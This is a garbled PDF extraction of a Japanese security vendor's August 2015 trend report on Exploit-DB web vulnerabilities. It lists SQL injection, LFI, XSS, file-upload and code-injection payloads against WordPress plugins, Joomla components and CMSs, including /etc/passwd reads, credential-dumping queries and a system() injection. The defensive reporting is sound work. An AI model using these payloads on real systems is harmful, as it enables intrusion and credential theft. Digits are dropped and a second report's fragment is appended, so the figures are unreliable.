- PDF Free Download

Size: px

Start display at page:

Download ""

えのおとべ
5 years ago
Views:

1 205.08

2 Pluck PHPfileNavigator PhpWiki PHP News Script Nuts Wolf up.time Aruba Mobility Controller サマリーペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 205 年 8 月は Exploit-DB の分析結果をみると SQL インジェクション (SQL Injection) 攻撃に関するが最も多く報告されました今回の SQL インジェクション攻撃は主に特定 Web アプリケーションのアーキテクチャー上の問題で見つかるを悪用するものが殆どでありまた大抵簡単に実行できる攻撃でした SQL インジェクションはその性質上攻撃が成功したら次に 2 次攻撃が入りますがそれによりシステムの重要な情報や個人情報が漏洩する可能性があるため大変危険度が高い攻撃ですログインページ掲示板など頻繁にアクセスされるページが単純なクエリーによって攻撃にさらされることがないよう常に注意してください主要ソフトウェア別の発生の状況を見るとでのが最も多く見つかりましたを利用する企業の管理者様はその Web サイトの PlugIn をチェックしもしのある PlugIn であれば該当 PlugIn を必ず最新バージョンにアップデートしてください. 別件数カテゴリ SQL インジェクション (SQL Injection) 件数 6 クロスサイトスクリプティング (Cross Site Scripting:XSS) ローカルファイル挿入 (Local File Inclusion:LFI) 7 ファイルアップロード (File Upload) コードインジェクション (Code Injection) 合計 8 6 別件数危険度別件数危険度件数割合危険度別分類早急対応要 24% 高 2 76% 合計 8 00% 早急対応要高 2. 攻撃実行の難易度別件数難易度件数割合難 8% 中 24% 易 26 68% 合計 8 00% 攻撃実行の難易度別件数 26 難中易 4. 主なソフトウェア別発生件数ソフトウェア名 Pluck PHPfileNavigator PhpWiki PHP News Script Nuts Wolf up.time Aruba Mobility Controller 合計件数主なソフトウェア別発生件数 Pluck 6 PHPfileNavigator PhpWiki PHP News Script 0 Nuts Wolf up.time Aruba Mobility Controller Copyright 205 Penta Security Systems Inc. All rights reserved

3 危険度分類基準早急対応要 : 攻撃が成功した場合システムへ侵入可高 : システム情報を取得するかあるいはクライアントに2 次被害を及ぼす中 : 情報漏洩攻撃実行難易度分類基準難 : 複数のを突いた攻撃パターン対象のシステムの重要な情報を取得するため高度な攻撃コードを採用したパターン知らされていない攻撃コードを採用したパターンのいずれかに該当する中 : 攻撃手法自体は難しくないが迂回コードを採用したパターン易 : 回のリクエストで攻撃が成立するパターン複数回トライするも既知の攻撃コードを採用したパターンのいずれかに該当する ** 5 件以上発生した主なソフトウェア別の詳細情報 EDB 番号カテゴリ攻撃難易度危険度名ソフトウェア名 7744 SQL Injection 難緊急対応要 Video Gallery admin-ajax.php SQL Injection 7754 LFI 易緊急対応要 Candidate Application Form Plugin LFI 易緊急対応要 Simple Image Manipulator Plugin.0 - download.php LFI 7752 LFI 易緊急対応要 Recent Backups Plugin download-file.php LFI 775 LFI 易緊急対応要 WPTF Image Gallery.0 - ajax_load.php LFI 7822 SQL Injection 易高 WP Symposium Plugin 5. - forum_functions.php SQL Injection 7824 SQL Injection 易高 WP Symposium Plugin 5. - get_album_item.php SQL Injection 7824 SQL Injection 易高 WP Symposium Plugin 5. - get_album_item.php SQL Injection 706 XSS 易高 Googmonify Plugin options-general.php XSS Copyright 205 Penta Security Systems Inc. All rights reserved

4 日付 EDB 番号カテゴリ攻撃難易度危険度名攻撃コード対象プログラム対象環境 File Upload 易高 POST /microweberlatest/plupload?token= &path=media%25255Clocalhost%2 5255C&path=media%255Clocalhost%255Cuploaded% 255C HTTP/. Connection: Close Accept: text/html, application/xhtml+xml, */*.0. File Upload Accept-Language: ko-kr Filter Bypass Remote PHP User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Code Execution - Windows NT 6.2; WOW64; Trident/6.0).0. /microweber-latest/ File Content-Type: multipart/form-data; boundary= Upload dd00208f dd00208f2 Content-Disposition: form-data; name="fil"; filename="phpinfo.php" Content-Type: application/octet-stream XSS 易高.0. - Stored XSS And CSRF Add Admin Exploit - /microweberlatest/api/save_option XSS POST /microweber-latest/api/save_option HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/55.7 KHTML, like Gecko Chrome/ Safari/ SQL Injection 中高 SQL Injection 難緊急対応要 LFI 易緊急対応要 SQL Injection 難緊急対応要 LFI 易緊急対応要 LFI 易緊急対応要 LFI 易緊急対応要 PHP News Script allgallery.php SQL Injection Video Gallery admin-ajax.php SQL Injection Candidate Application Form Plugin article.php SQL Injection Simple Image Manipulator Plugin.0 - download.php LFI option_key=website_keywords&option_group=websit e&option_value="><img src=j onerror=confirm("zsl")> /demo/allgallery.php?id=- 00%27+union+select+user()%2 /wp-admin/adminajax.php?action=googleadsense&vid=0 UNION SELECT CAST(CHAR(48, 2, 85, 78, 7, 7, 78, 2, 8, 6, 76, 6, 67, 84, 2, 67, 7, 78, 67, 65, 84, 40, 67, 65, 8, 84, 40, 67, 72, 65, 82, 40, 57, 55, 44, 2, 5, 56, 44, 2, 52, 57, 44, 2, 5, 56, 44, 2, 4, 50, 5, 44, 2, 4, 4, 5, 44, 2, 5, 56, 44, 2, 52, 57, 44, 2, 5, 54, 44, 2, 5, 56, 44, 2, 5, 52, 44, 2, 4, 48, 5, 44, 2, 4, 4, 4, 44, 2, 4, 4, 4, 44, 2, 4, 48, 5, 44, 2, 4, 48, 56, 44, 2, 4, 48, 4, 44, 2, 57, 55, 44, 2, 4, 48, 48, 44, 2, 4, 4, 5, 44, 2, 4, 48, 4, 44, 2, 4, 4, 48, 44, 2, 4, 4, 5, 44, 2, 4, 48, 4, 44, 2, 57, 5, 44, 2, 57, 57, 44, 2, 4, 4, 4, 44, 2, 4, 48, 48, 44, 2, 4, 48, 4, 44, 2, 5, 52, 44, 2, 5, 57, 44, 2, 4, 4, 5, 44, 2, 5, 56, 4, 2, 7, 5, 2, 67, 72, 65, 82, 4, 44, 2, 76, 6, 78, 7, 84, 72, 40, 7, 5, 0, 4, 5, 2, 7, 5, 5, 4, 44, 2, 67, 65, 8, 84, 40, 67, 72, 65, 82, 40, 5, 56, 44, 2, 5, 52, 4, 2, 7, 5, 2, 67, 72, 65, 82, 4, 44, 2, 7, 5, 0, 4, 5, 2, 7, 5, 5, 44, 2, 67, 65, 8, 84, 40, 67, 72, 65, 82, 40, 5, 52, 44, 2, 5, 57, 44, 2, 4, 50, 5, 4, 2, 7, 5, 2, 67, 72, 65, 82, 4, 4, 2, 70, 82, 7, 77, 2,, 2, 5, 7, 5, 0, 4, 5, 2, 87, 72, 6, 82, 6, 2, 7, 68, 2, 6, 2, 4) as CHAR) /wp-content/plugins/candidate-applicationform/downloadpdffile.php?filename=../../../../../../../.. /../../etc/passwd /wds_news/article.php?id=- +union+select+,group_concat(username,0xa,pass word),,4,5,6,7,8,,0+from+cms_admin-- /wp-content/plugins/./simple-imagemanipulator/controller/download.php?filepath=/etc/pa sswd WPTF Image Gallery.0 - ajax_load.php LFI Recent Backups /wp-content/plugins/recent-backups/downloadfile.php?file_link=/etc/passwd Plugin download-file.php LFI /wp-content/plugins/wptf-image-gallery/libmbox/ajax_load.php?url=/etc/passwd PHP News Script PHP News Script Video Gallery 2.7 Candidate Application Form Plugin.0 Simple Image Manipulator Plugin.0 Recent Backups Plugin 0.7 WPTF Image Gallery.0 Copyright 205 Penta Security Systems Inc. All rights reserved

5 日付 EDB 番号カテゴリ攻撃難易度危険度名攻撃コード対象プログラム対象環境 SQL Injection 難緊急対応要 POST /joomla.4./index.php?option=com_jem&view=mye vents&itemid=5 HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/55.7 KHTML, like Gecko Chrome/ Safari/55.7 Event Manager index.php SQL Injection filter=&filter_search=&limit=0&cid%5b%5d=,2)% 20AND%20(SELECT%2065%20FROM(SELECT%20 COUNT(*),CONCAT(VERSION(),FLOOR(RAND(0)*2))x %20FROM%20INFORMATION_SCHEMA.TABLES%20G ROUP%20BY%20x)a)%20AND%20(577=577&filter _order=a.dates&filter_order_dir=&enable addres s=0&boxchecked=&task=myevents.unpublish&optio n=com_jem&5c57c6e06bd f47b562ecaf= Event Manager SQL Injection 中高 com_informations component - index.php SQL Injection /index.php?option=com_informations&view=sousthe mes&themeid=.+union+select+,222,version( )%2 com_informatio ns component SQL Injection 中高 com_memorix component - index.php SQL Injection /index.php?option=com_memorix&task=result&search plugin=theme&itemid=60&themeid=- 854+union+select+,222,version(),444,555,666,7 77,888,--+AbuHassan com_memorix component LFI 易高 Picasaweb - plugins_player.php LFI /plugins/gkplugins_picasaweb/plugins/plugins_player. php?f=../../../index.php Picasaweb Code Injection 中緊急対応要 Nuts CMS Remote - login.php Code Injection /login.php?r=<?php+error_reporting(0);print(_nutcm sid_);system(base64_decode(\$_server[http_cmd ]));die;+?> Nuts Nuts CMS SQL Injection 易高 WP Symposium Plugin 5. - forum_functions.php SQL Injection POST /wordpress/wp-content/plugins/wpsymposium/ajax/forum_functions.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/55.7 KHTML, like Gecko Chrome/ Safari/55.7 Cache-Control: no-cache WP Symposium Plugin 5. action=gettopic&topic_id= AND SLEEP(5)&group_id= SQL Injection 中高 CMS /- CMS/site/index.php/admin/pa ges/view-tree/ SQL Injection /-CMS/site/index.php/admin/pages/viewtree/0' union all select,concat( , ":", password),,4,5,6,7,8,,0 from bigtree_users %2/ CMS SQL Injection 易高 POST /- CMS/site/index.php/admin/ajax/pages/get-seo-score HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 CMS /- AppleWebKit/55.7 KHTML, like Gecko CMS/site/index.php/admin/aja Chrome/ Safari/55.7 x/pages/get-seo-score SQL Injection CMS 4.2. content=foo&resources=bar&id=foo' or =2%2&title=Trees of All Sizes SQL Injection 易高.. - index.php SQL Injection /codoforum/index.php?u=/page/6 and =%2/terms-of-service.. Copyright 205 Penta Security Systems Inc. All rights reserved

6 日付 EDB 番号カテゴリ攻撃難易度危険度名攻撃コード対象プログラム対象環境 XSS 中高 PHPfileNavigator navega.php XSS /PHPfileNavigator/pfn- 2../navega.php?PHPSESSID=HELL&dir= " <DIV onmousemove= "alert(document.cookie) " </a> PHPfileNavigator PHPfileNavigator XSS 中高 PHPfileNavigator accion.php XSS /PHPfileNavigator/pfn- 2../accion.php?accion=buscador&PHPSESSID=HELL &dir= PHPfileNavigator PHPfileNavigator 2.. " <DIV onmousemove= "alert(document.cookie) " </a> XSS 中高 PHPfileNavigator preferencias.php XSS /PHPfileNavigator/pfn- 2../preferencias.php?PHPSESSID=HELL&dir= " <DIV onmousemove= "alert(document.cookie) " </a> PHPfileNavigator PHPfileNavigator SQL Injection 易高 SQL Injection 易高 WP Symposium Plugin 5. - get_album_item.php SQL Injection WP Symposium Plugin 5. - get_album_item.php SQL Injection /wp-content/plugins/wpsymposium/get_album_item.php?size=version%28%2 %20;%20-- /wp-content/plugins/wpsymposium/get_album_item.php?size=version%28%2 %20;%20-- WP Symposium Plugin 5. WP Symposium Plugin XSS 易高 up.time main.php XSS /main.php?section=usercontainer&subsection=edit7b ef8%25c%252ftitle%25e%25cscript%25ealert% 2528%252%25c%252fscript%25ea05&id=6&n ame=testingus4 up.time up.time XSS 中高 Aruba Mobility Controller switch_mon.html XSS /screens/switch/switch_mon.html?mode=plogcustom&mode-title=test</td><img width= height= src=/images/logo-mobility-controller.gif onload=alert(document.cookie)> Aruba Mobility Controller Aruba Mobility Controller SQL Injection 易高 webupgrade.php SQL Injection POST /webupgrade/webupgrade.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/55.7 KHTML, like Gecko Chrome/ Safari/ step=&login='&password='&show_advanced_output= SQL Injection 易高 load_logfiles.php SQL Injection /remotereporter/load_logfiles.php?server=%20and% 20=&url=a Copyright 205 Penta Security Systems Inc. All rights reserved

7 日付 EDB 番号カテゴリ攻撃難易度危険度名攻撃コード対象プログラム対象環境 SQL Injection 易高 verification.php SQL Injection POST /webadmin/auth/verification.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/55.7 KHTML, like Gecko Chrome/ Safari/ login= and = SQL Injection 易高 index.php SQL Injection POST /webadmin/deny/index.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/55.7 KHTML, like Gecko Chrome/ Safari/ dpid= and = XSS 易高 Googmonify Plugin options-general.php XSS POST /wp-admin/optionsgeneral.php?page=googmonify.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/55.7 KHTML, like Gecko Chrome/ Safari/55.7 Googmonify Plugin 0.8. PID="><script>alert(document.cookie)</script>&Lim it=0&analytics=0&aid="><script>alert(/ehsan Hosseini/)</script>&GoogmonifyUpdate=Update Options» LFI 易緊急対応要 Pluck CMS admin.php LFI POST /pluck/admin.php?action=language HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/55.7 KHTML, like Gecko Chrome/ Safari/55.7 Pluck Pluck CMS 4.7. cont=../../../../../../../etc/passwd&save=save Copyright 205 Penta Security Systems Inc. All rights reserved

8 日付 EDB 番号カテゴリ攻撃難易度危険度名攻撃コード対象プログラム対象環境 File Upload 易高 Pluck CMS admin.php File Upload POST /pluck/admin.php?action=files HTTP/. Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.2; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary= dd00208f2 Pluck Pluck CMS dd00208f2 Content-Disposition: form-data; name="fil"; filename="phpinfo.php5" Content-Type: application/octet-stream <? phpinfo();?> dd00208f XSS 易高 Pluck CMS admin.php XSS POST /pluck/admin.php?action=images HTTP/. Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.2; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary= dd00208f2 Pluck Pluck CMS dd00208f2 Content-Disposition: form-data; name="imagefile"; filename="<img src=# onerror=alert(7)>.png" Content-Type: application/octet-stream <? phpinfo();?> dd00208f XSS 易高 Pluck CMS admin.php XSS (2) POST /pluck/admin.php?action=language HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/55.7 KHTML, like Gecko Chrome/ Safari/55.7 Pluck Pluck CMS File Upload 易高 title=hello2&seo_name=&content=<script>alert( 7)</script>&description=&keywords=&hidden=no&su b_page=&theme=default&save=save POST /wolfcms/?/admin/plugin/file_manager/browse/ HTTP/. Connection: Close Wolf CMS - Accept: text/html, application/xhtml+xml, */* /wolfcms/?/admin/plugin/file_ Accept-Language: ko-kr manager/browse/ File Upload User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.2; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary= dd00208f2 Wolf Wolf CMS XSS 易高 LFI 易高 XSS 易高 PhpWiki index.php XSS PhpWiki index.php LFI PhpWiki index.php XSS (2) /phpwiki/index.php?pagename=%c%2fscript%e% Cscript%Ealert%28document.cookie%2%C%2Fs cript%e%c!-- /phpwiki/index.php/phpwikiadministration?action=loa dfile&overwrite=&source=/etc/group POST /phpwiki/index.php/userpreferences HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 AppleWebKit/55.7 KHTML, like Gecko Chrome/ Safari/55.7 PhpWiki PhpWiki.5.4 PhpWiki PhpWiki.5.4 PhpWiki PhpWiki.5.4 Copyright 205 Penta Security Systems Inc. All rights reserved

最新 Web トレンドレポート (06.04) ~ Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報ですサマリーペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 4

最新 Web トレンドレポート (06.04) ~ Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報ですサマリーペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 4 06.04 最新 Web トレンドレポート (06.04) 06.04.0~06.04.0 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報ですサマリーペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 4 月公開された Exploit-DB の分析結果クロスサイトスクリプティング (Cross